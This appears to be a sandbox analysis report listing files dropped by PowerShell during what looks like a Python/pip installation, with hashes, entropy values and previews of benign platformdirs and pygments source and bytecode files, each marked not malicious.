                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9682
                                                                                                    Entropy (8bit):5.050705521055384
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:pWGnDdCIGjpgRhUWqEpUBo9B6++mj8dvHxLfcSWAhzg:p9nDdlKoAk8xHxRjzg
                                                                                                    MD5:B5A657CE1DA93DCED87B801223FE2EEC
                                                                                                    SHA1:ACDA1F9AF16CD82F85BE3FC3E8A399F07B20820E
                                                                                                    SHA-256:774B2FCB27D1C683607B72E8AC0200FA4AD652C703A56160382BD457116F2C0F
                                                                                                    SHA-512:55394C440F16508E03D59BC29900674982559C345343370C5DDFC9B2E0C073BA48A402B735AB9E308B151E22A6D0AAB089973590AAB8F2457D2AEC4E10F1DF73
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r d.d.l.Z.e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z.....G.d...d.e.........Z.y.).z.Base API......)...annotationsN)...ABC..abstractmethod)...Path)...TYPE_CHECKING)...........)...Literalc...........................e.Z.d.Z.d.Z...............d"..............................d#d...Z.d$d...Z.d%d...Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z e.d'd........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5647
                                                                                                    Entropy (8bit):5.120076615370562
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:jp7FCcbHzE9nmnUGNI2ngsOUHIJtvv3KnRc:FxCcbHzE1GN0sOqIfb
                                                                                                    MD5:7DA60BB3246A70CCC7C2904EBA91100A
                                                                                                    SHA1:782B4DA74A6A112C560C16AE2147129892C0A3CD
                                                                                                    SHA-256:96CE3696655AE21F335542D8E35566A622774E0E4F192D345607A3E49CE0D038
                                                                                                    SHA-512:A15E8603C567908E625D216D7D8820B9E54E730BA94AEB416D0D0B8B81CC88366381F8ECF4D5E3EF49005495B6E0B3674F6B937EF5A93C393225D89F6FA27D73
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf^.........................D.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....G.d...d.e.........Z.d.g.Z.y.).z.macOS......)...annotationsN.....)...PlatformDirsABCc...........................e.Z.d.Z.d.Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.y.)...MacOSa..... Platform directories for the macOS operating system. Follows the guidance from `Apple documentation. <https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/MacOSXDirectories/MacOSXDirectories.html>`_.. Makes use of the `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. c.....................^.....|.j...................t...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12451
                                                                                                    Entropy (8bit):5.281769364699578
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qYn+H5wHxeffr8/EmlCIY3gqZbDvyKdXpYJ:1+HQx0z8/EnIYQeHvXdXpYJ
                                                                                                    MD5:2576EF6D502793C3B16ED6A0A03CA148
                                                                                                    SHA1:944561E720599216DA3612BF7C64FC16B97A28B6
                                                                                                    SHA-256:2155F11A232098E712A28F98FBB159A8BD8886893066D37BE22C849363CE5324
                                                                                                    SHA-512:05BEA454121A6A111920E941DD277A0FE0D9F069F9F581499C81DC29CC8B88DDCE63389A75CD70ABA5F10DE058CC01916E5369108BCF00CD215FACCB22E93052
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfi".............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j...................d.k(..r.d.d...Z.n.d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.d.d...Z.d.g.Z.y.).z.Unix......)...annotationsN)...ConfigParser)...Path.....)...PlatformDirsABC..win32c...........................d.}.t.........|...........).Nz.should only be used on Unix)...RuntimeError)...msgs.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/platformdirs/unix.py..getuidr........s........+......3...........).r....c.....................R.....e.Z.d.Z.d.Z.e.d.d...........Z.e.d.d...........Z.d.d...Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.d.d...Z.y.)...Unixa..... On Unix/Linux, we follow the. `XDG Basedir Spe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):321
                                                                                                    Entropy (8bit):5.361286921298423
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:r/0OsSITnIflyrtW3D6WNAQ9ACqn23d6oAreasGH5aylehK6Z+vYq:AOSIf4GmWJjImafH5aylehK6wZ
                                                                                                    MD5:74CAB6405DE12C05DAF374E4EB4BC96F
                                                                                                    SHA1:CB7CA231BD1318CCB0CFB6F63A95F5C05DC3B952
                                                                                                    SHA-256:04F968C91A3C8FDB62DC7B76DD592BB36F68EC2C0DDD1B95926310397C7BA50F
                                                                                                    SHA-512:EF01B39829FFFC69AA666FDB0507D2BB8C692529E0A012DC2FB527BD82BB9CCF5B3D87A7F3E884C465AD1829B4EE6883D8EBEE4F5308B7699CC677F35717C28C
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.x.Z.Z.d.x.Z.Z.y.).z.3.8.1)................N)...__version__..version..__version_tuple__..version_tuple........lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/platformdirs/version.py..<module>r........s............. ......g.$-..-....Mr....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13009
                                                                                                    Entropy (8bit):5.239625721967246
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:SEcdwBXxIgB+DuMofny+hU85erYOaqsgcXk:SEcdwBXxIlDEPygUUerFvSk
                                                                                                    MD5:6EA14FD49DDB323A3D6FE9F881B3A9E2
                                                                                                    SHA1:EABCF0DB15885FCF4F881C3B07A847AB0F35A2A6
                                                                                                    SHA-256:23D2C773D85B13D245451C0401B75FC0C59C7E764BDA70B660F520C628F97618
                                                                                                    SHA-512:8CA5B62768B33C69DDBF2C5665D616BB57B6B95A7D2883A538E8DB52D260E3DD548CD1FD156483E95D8E84EABBBDC94E72F3F046D99C690310B2224DD6B1F99C
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfe%..............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....e.d.............e.................Z.d.g.Z.y.).z.Windows......)...annotationsN)...lru_cache)...TYPE_CHECKING.....)...PlatformDirsABC)...Callablec...........................e.Z.d.Z.d.Z.e.d.d...........Z.d.d...d.d...Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.y.)...Windowsa..... `MSDN on where to store app data files. <http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120>`_.. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `appauthor <platformdirs.api.PlatformDirsABC.appauthor>`,. `version <platformdirs.api.PlatformDirsABC
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7211
                                                                                                    Entropy (8bit):4.742765976902356
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:IGoI72STvJKTm3tKy1rdnDTgFPYOiPOVKiI//Kgd20HPhC:IG5ETmIyZ9UwlPOgfC/
                                                                                                    MD5:B88ED255CD7DFB30CB3B29AC5DB896B3
                                                                                                    SHA1:AFFD713179820AA4E5A202972DCF104BE2C978C2
                                                                                                    SHA-256:CBF10430AC18976F9BCD8043A2F92C4A7F26EFAA27D0B75AF1EC8992C55013D5
                                                                                                    SHA-512:26EBD3A543B1A7CC9DA502D5F3D8DAB0CAC0385C53F31F3DC254D0105BD6148C2A3A68B914400DF6974CB803B140EF95E6793E8B20EAD3752C8ADCBA664A372D
                                                                                                    Malicious:false
                                                                                                    Preview:"""Android.""".from __future__ import annotations..import os.import re.import sys.from functools import lru_cache.from typing import cast..from .api import PlatformDirsABC...class Android(PlatformDirsABC):. """. Follows the guidance `from here <https://android.stackexchange.com/a/216132>`_. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. """.. @property. def user_data_dir(self) -> str:. """:return: data directory tied to the user, e.g. ``/data/user/<userid>/<packagename>/files/<AppName>``""". return self._append_app_name_and_version(cast(str, _android_folder()), "files").. @property. def site_data_dir(self) -> str:. """:return: data directory shared by users, same as `user_data_dir`""". return self.user_data_dir.. @property. def user_config_dir(self) -> str:. """.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7132
                                                                                                    Entropy (8bit):4.492814423682991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:9uSGliZEBgZNvVpRnjhGIFE+aswgvZ6Z/n1Fg/cw:9uSkcu+T/Z0w
                                                                                                    MD5:CD9DAA2FBC97E78B4F2CCCA85EEE331C
                                                                                                    SHA1:29FA6EB99DF6529E731EFB845F2D968858EBB392
                                                                                                    SHA-256:8D6B57D3A8C0272B58AE42433AA125B3DEE60A4C87452664A2A5256CC2B941EC
                                                                                                    SHA-512:07705C4A7B4A0981323851307C6D84A1E0ABD357D71E303BB515BF4861EFC017966DBDC225B7E1836E6BD6A7A68956CBB318DF48A6883E3744F5470245996832
                                                                                                    Malicious:false
                                                                                                    Preview:"""Base API.""".from __future__ import annotations..import os.from abc import ABC, abstractmethod.from pathlib import Path.from typing import TYPE_CHECKING..if TYPE_CHECKING:. import sys.. if sys.version_info >= (3, 8): # pragma: no cover (py38+). from typing import Literal. else: # pragma: no cover (py38+). from pip._vendor.typing_extensions import Literal...class PlatformDirsABC(ABC):. """Abstract base class for platform directories.""".. def __init__( # noqa: PLR0913. self,. appname: str | None = None,. appauthor: str | None | Literal[False] = None,. version: str | None = None,. roaming: bool = False, # noqa: FBT001, FBT002. multipath: bool = False, # noqa: FBT001, FBT002. opinion: bool = True, # noqa: FBT001, FBT002. ensure_exists: bool = False, # noqa: FBT001, FBT002. ) -> None:. """. Create a new platform directory... :param appname: See `appname`.. :param ap
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3678
                                                                                                    Entropy (8bit):4.801640765455566
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:OO97j3xWbKAyK4GbCnXlhSgtTeyDAHy+fRIW4oyviDiauyl9KapyT8aOwyoAsnaH:n7FojwNDMSnZvSfffMJORnRwZi5f
                                                                                                    MD5:9668A7BB908E9053E7A226EC2002E273
                                                                                                    SHA1:882A251FB3C3B34A19CC3FD6C2C0890C8A16F68E
                                                                                                    SHA-256:2EE7953A85601960C1C106FC385C1791529F567DF708CD4B9307F5F80F3AB514
                                                                                                    SHA-512:2217BE44BB1DE54F040DE9A21EA34C2C0349781283E0C029EAF3F513E6E2104C3FC63C0924C004F89124F4F3E7BA2DA38CD490388A7DE11BA48CB63FF37B8CC4
                                                                                                    Malicious:false
                                                                                                    Preview:"""macOS.""".from __future__ import annotations..import os.path..from .api import PlatformDirsABC...class MacOS(PlatformDirsABC):. """. Platform directories for the macOS operating system. Follows the guidance from `Apple documentation. <https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/MacOSXDirectories/MacOSXDirectories.html>`_.. Makes use of the `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. """.. @property. def user_data_dir(self) -> str:. """:return: data directory tied to the user, e.g. ``~/Library/Application Support/$appname/$version``""". return self._append_app_name_and_version(os.path.expanduser("~/Library/Application Support")) # noqa: PTH111.. @property. def site_data_dir(self) -> str:. """:return: data directory shared by users, e
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8809
                                                                                                    Entropy (8bit):4.794758253446687
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Vlp+wzUwWDKm07bHnAutWeWvSSBSQYjnTboj2Yl+rzuhRGkML+J:VeOygESS8BncSYl+G5J
                                                                                                    MD5:79CDF1C44638AE984A2970F326A72109
                                                                                                    SHA1:1277760E5B8E451F64EBF06FF97C74398EE2E082
                                                                                                    SHA-256:DB626147C658D1A2F14950859CAADCE9FD62CFA1AFE362B6E036A3EDA4E37D28
                                                                                                    SHA-512:0A7ED73FCEA6ECD6509F006500EA3E4290526BF9F3C4D86F142E6C0B1FC2F5068FEC40AC93995932FCD80E63DA22F6D17A9BBBC0BDB744D930DB51B6A211207E
                                                                                                    Malicious:false
                                                                                                    Preview:"""Unix.""".from __future__ import annotations..import os.import sys.from configparser import ConfigParser.from pathlib import Path..from .api import PlatformDirsABC..if sys.platform == "win32":.. def getuid() -> int:. msg = "should only be used on Unix". raise RuntimeError(msg)..else:. from os import getuid...class Unix(PlatformDirsABC):. """. On Unix/Linux, we follow the. `XDG Basedir Spec <https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html>`_. The spec allows. overriding directories with environment variables. The examples show are the default values, alongside the name of. the environment variable that overrides them. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `multipath <platformdirs.api.PlatformDirsABC.multipath>`,. `opinion <platformdirs.api.PlatformDirsABC.opinion>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ens
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):160
                                                                                                    Entropy (8bit):4.561427135160526
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Scb9cFWARQ7RYZG7zGN6zRXv3VyLQdLxZvBL4AbJAQnAj3qdJz:Scb+sARQ7CG7qN6iQdNpBRdAQnAGdh
                                                                                                    MD5:600718EEF039BB1F40A5CDB508DC6C81
                                                                                                    SHA1:758CF01A74194429A53AC797732AA6EA741ECB00
                                                                                                    SHA-256:99ABD94D02092177DD7B011A4939FB116ACD7CF656791A1F6FEEF8C6A5B97F63
                                                                                                    SHA-512:5BF4BD02594724A0C25C16CDECE84943692954E69B75BD042E35B0E48BDE503B16D75BCDEA58EE3B635AB235EC3EC4D6AC92FA0A1FD7586EA0E11A7493D4F650
                                                                                                    Malicious:false
                                                                                                    Preview:# file generated by setuptools_scm.# don't change, don't track in version control.__version__ = version = '3.8.1'.__version_tuple__ = version_tuple = (3, 8, 1).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9573
                                                                                                    Entropy (8bit):5.075076832425199
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Dz5c0mNQSrvSYAnxq5p9cdNHpDP18y3r8kFfFc:f5c31+n26lfc
                                                                                                    MD5:1B10C536F6870973A7FC134015A9E844
                                                                                                    SHA1:4CA3A38027B37588FB1B16C3833B3D5E5581CFE5
                                                                                                    SHA-256:E13B5B3C6A161B63D1808D75BAAB836BB79193C4DCC6F9D436EB8C19922D9D77
                                                                                                    SHA-512:3A0A0DFA9F3292F2F653AB81D533C70825CD29ABF95B27266D2898D406670B0CF085BD2E35AD57A678F8F45AF59CFE5873FEF62FC7A1462D0750C6F1A57F9D86
                                                                                                    Malicious:false
                                                                                                    Preview:"""Windows.""".from __future__ import annotations..import ctypes.import os.import sys.from functools import lru_cache.from typing import TYPE_CHECKING..from .api import PlatformDirsABC..if TYPE_CHECKING:. from collections.abc import Callable...class Windows(PlatformDirsABC):. """. `MSDN on where to store app data files. <http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120>`_.. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `appauthor <platformdirs.api.PlatformDirsABC.appauthor>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `roaming <platformdirs.api.PlatformDirsABC.roaming>`,. `opinion <platformdirs.api.PlatformDirsABC.opinion>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. """.. @property. def user_data_dir(self) -> str:. """. :return: data directory tied to the user, e.g.. ``%USERPROFILE%\\AppData\\Local\\$appauthor\\$appn
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2983
                                                                                                    Entropy (8bit):4.615037148370751
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:4H4DMeNykEe7yMQTleKpKSGErxGpYWiywW6UiGkNyWkggGoHtLj1sfywL2niXGkM:4H4DtykEe7HswKpKSziYx9/NvUNtsFyp
                                                                                                    MD5:CDD01A44CB801A2AF69D0D75DB8D1E13
                                                                                                    SHA1:9B2DBD30889307DDA6766E27E21D9E5BE91E0801
                                                                                                    SHA-256:E80B8396342DBDFF3D0D3354C9633B937A1494FFE5ABBD0D53E20D28AB5E3816
                                                                                                    SHA-512:5A5461FC5B40A9931F8CD9893EDA2F6F09FCBDD79E555CD07D8E38729299776C60922BA8A877B5BD927B36BDE9D5C5CF17769F51F105D9A83F38747C3AE8AD31
                                                                                                    Malicious:false
                                                                                                    Preview:""". Pygments. ~~~~~~~~.. Pygments is a syntax highlighting package written in Python... It is a generic syntax highlighter for general use in all kinds of software. such as forum systems, wikis or other applications that need to prettify. source code. Highlights are:.. * a wide range of common languages and markup formats is supported. * special attention is paid to details, increasing quality by a fair amount. * support for new languages and formats are added easily. * a number of output formats, presently HTML, LaTeX, RTF, SVG, all image. formats that PIL supports, and ANSI sequences. * it is usable as a command-line tool and as a library. * ... and it highlights even Brainfuck!.. The `Pygments master branch`_ is installable with ``easy_install Pygments==dev``... .. _Pygments master branch:. https://github.com/pygments/pygments/archive/master.zip#egg=Pygments-dev.. :copyright: Copyright 2006-2023 by the Pygments team, see AUTHO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):353
                                                                                                    Entropy (8bit):4.920011790990273
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:Y6ejA2UeqOUcMrqA1Akssu9IuH8HodrC1QATkTAFMuwdlEkc:Y6epArqA1bssqn8HodmCVYMHd/c
                                                                                                    MD5:10FA0A45A3D060D07E1C9E502923E13A
                                                                                                    SHA1:2B06C1D0254222D69A45DB8451D6C5A884285E5A
                                                                                                    SHA-256:7ACF0428CBD78F9C93A087D0FA97F70EFE539C879E33AB0C1342D6FA7E1E707A
                                                                                                    SHA-512:031F304CA66A48AF4B064B92DBD79189E5164380E6D5B877042B40A59839217156581D7CBAF20B5F0C082EE65EC3936E26A58C33B3EDC7D4CFDB3A0CAD61BD7C
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.__main__. ~~~~~~~~~~~~~~~~~.. Main entry point for ``python -m pygments``... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import sys.from pip._vendor.pygments.cmdline import main..try:. sys.exit(main(sys.argv)).except KeyboardInterrupt:. sys.exit(1).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3499
                                                                                                    Entropy (8bit):5.488732116317891
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:NAH4DtykEe7HswKpKSCNYpCM/hMuzNKUNTMdbCeobUS:NltykEe7jIbQUqdbC7p
                                                                                                    MD5:9C1A2CAF189C9177976C5B9E155908CE
                                                                                                    SHA1:66344E69D4C4C71B688806923F8275C19E4697C8
                                                                                                    SHA-256:F599E0CD444DB5FB52343CBEDF004D9F60751DEE0E3F572B8C456B79AA903C14
                                                                                                    SHA-512:60C89B8C139A0D17C4AC81ECD0A2FCEC73112477E8B02371F5729D11D5770579CFDD562AA9240789B5F22A6711B5DC778F20EC80828D3901C9635A42CD9F2588
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................>.....d.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.g.d...Z.d...Z.d.d...Z.d.d...Z.y.).a..... Pygments. ~~~~~~~~.. Pygments is a syntax highlighting package written in Python... It is a generic syntax highlighter for general use in all kinds of software. such as forum systems, wikis or other applications that need to prettify. source code. Highlights are:.. * a wide range of common languages and markup formats is supported. * special attention is paid to details, increasing quality by a fair amount. * support for new languages and formats are added easily. * a number of output formats, presently HTML, LaTeX, RTF, SVG, all image. formats that PIL supports, and ANSI sequences. * it is usable as a command-line tool and as a library. * ... and it highlights even Brainfuck!.. The `Pygments master branch`_ is installable with ``easy_install Pygments==dev``... .. _Pygments master branch:. https://github.com/pygments/pygme
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):745
                                                                                                    Entropy (8bit):5.569113025404681
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:dJSBcKh6FHvVyi6epArqA1bssqs4ZxIAOyfnEImaM3ajq12nMuNjytEHzK:z+gz6epAGAoq+IE83fqjJjlHzK
                                                                                                    MD5:7150203B2EC61A966A1F5F7DF3630935
                                                                                                    SHA1:7CFF4795AE89E419ACEDFCE3ACEFE05CF2D945F1
                                                                                                    SHA-256:C27B7ABE33D1942DEFF10866022ADFE06BB7F6D8636AFA8A03200E3496B61E94
                                                                                                    SHA-512:61D37DEC9EDC95BBA1BF976A5D89EF6BC0AFE211F2AD0F6E203ABDDC2B66709B18CF9F797C69480B45AAA61258B08B15BCEDA0DE6DAF5DCE0F4C96B8DA70CBB8
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfa..............................d.Z.d.d.l.Z.d.d.l.m.Z.......e.j.....................e.e.j.....................................y.#.e.$.r.....e.j...................d...........Y.y.w.x.Y.w.).z.. pygments.__main__. ~~~~~~~~~~~~~~~~~.. Main entry point for ``python -m pygments``... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...main.....)...__doc__..sys..pip._vendor.pygments.cmdliner......exit..argv..KeyboardInterrupt........iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/__main__.py..<module>r........sI....................-.........C.H.H.T.#.(.(.^................C.H.H.Q.K......s....."1...A.....A..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26616
                                                                                                    Entropy (8bit):5.523539341517189
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:qgjiqUWfCPHhz7nnJqxUgXU4ZF8GBcRP6W2xUOy:9b5CPBz7nGUgXU4ZGP72Kt
                                                                                                    MD5:4BFAD3286D4C95172B8FE72AAAE92E50
                                                                                                    SHA1:AA95FCDE65B34A7AAA2DAF8B8D54319DC1EA1410
                                                                                                    SHA-256:75A3CD59A1B761A035072E84BE2F577485DC8CF221CC8232231A845169FD1FB9
                                                                                                    SHA-512:FE75716D561E26B212C795E683E3471C29A3D799D1D85520431CC1D918F3F1DC826BC0A2D689A2D8CA614BC59C528582628B10DB5D906C0373A6EC4D09ADF2E3
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.\........................h.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*m+Z+..d.d.l,m-Z-m.Z...d...Z/d...Z0d...Z1d...Z2d...Z3d...Z4..G.d...d.e.jj..........................Z5e.jl..................f.d...Z7y.).z.. pygments.cmdline. ~~~~~~~~~~~~~~~~.. Command line interface... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...dedent)...__version__..highlight)...ClassNotFound..OptionError..docstring_headline..guess_decode..guess_decode_from_terminal..terminal_encoding..UnclosingTextIOWrapper)...get_all_lexers..get_lexer_by_name..guess_lexer..load_lexer_from_file..get_lexer_for_filename..find_lexer_class_for_filename)...TextLexer)...LatexEmbeddedLexer..LatexFormatter)...get_all_formatters..get_formatter_by_name..load
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2637
                                                                                                    Entropy (8bit):5.632884110365061
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:lANaUGlGGwdCsxS6CLbP+EwHO64tabBZQkKd+g2viSv2m5I37pd:tVkNCoS6C3s8e7dvi+Uj
                                                                                                    MD5:D1131DCBDC3F6E5344ADD5EBA6CFE4ED
                                                                                                    SHA1:ABF1D3E899A9DEC3E9159D939D0E3D32CA069F44
                                                                                                    SHA-256:2D07C7F64C8BBF96F8068465F0DDB57A3A8F5F36EDC03589490B65777A796BDD
                                                                                                    SHA-512:1D02E3596D1486AFA7DA8D5EAAD47B3B62B6AB5344F8C98D881F283414611FF4F0358D813572763C4F430D047BB6B883126BABE644DA9CD5F98969A4BE6A6860
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................$.....d.Z.d.Z.i.Z.d.e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...g.d...Z.g.d...Z.d.Z...e.e.e.........D.]#..\...Z.Z.e.d.e.z...z...e.e.<...e.d.d.e.z...z...z...e.e.<...e.d.z...Z..%..[.[.[.e.d.....e.d.<...d...Z.d...Z.d...Z.y.).z.. pygments.console. ~~~~~~~~~~~~~~~~.. Format colored console output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details..z..[..z.39;49;00m..reset..01m..bold..02m..faint..03m..standout..04m..underline..05m..blink..06m..overline)...black..red..green..yellow..blue..magenta..cyan..gray)...brightblack..brightred..brightgreen..brightyellow..brightblue..brightmagenta..brightcyan..white.....z.%im.<........r....c...........................t.........d.....S...Nr........codes........hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/console.py..rese
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3243
                                                                                                    Entropy (8bit):5.222034270189328
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ZCaaSGZUGtuBWoPyzLXitxOvKaWp1+erceh4ev5Yne8a6i/go3qveLPzGxqUkAA:ZhaSkUIubyfKbUW4M58u6MChjA
                                                                                                    MD5:83ED29ECAD2BEE82651A846E4C51E843
                                                                                                    SHA1:D226EE44AFA9B1A79697A870282DAF9E718CDE9C
                                                                                                    SHA-256:087C4EAA261F339ABED2213B492B66C342971953F5AFF975ECB701BEB3174E85
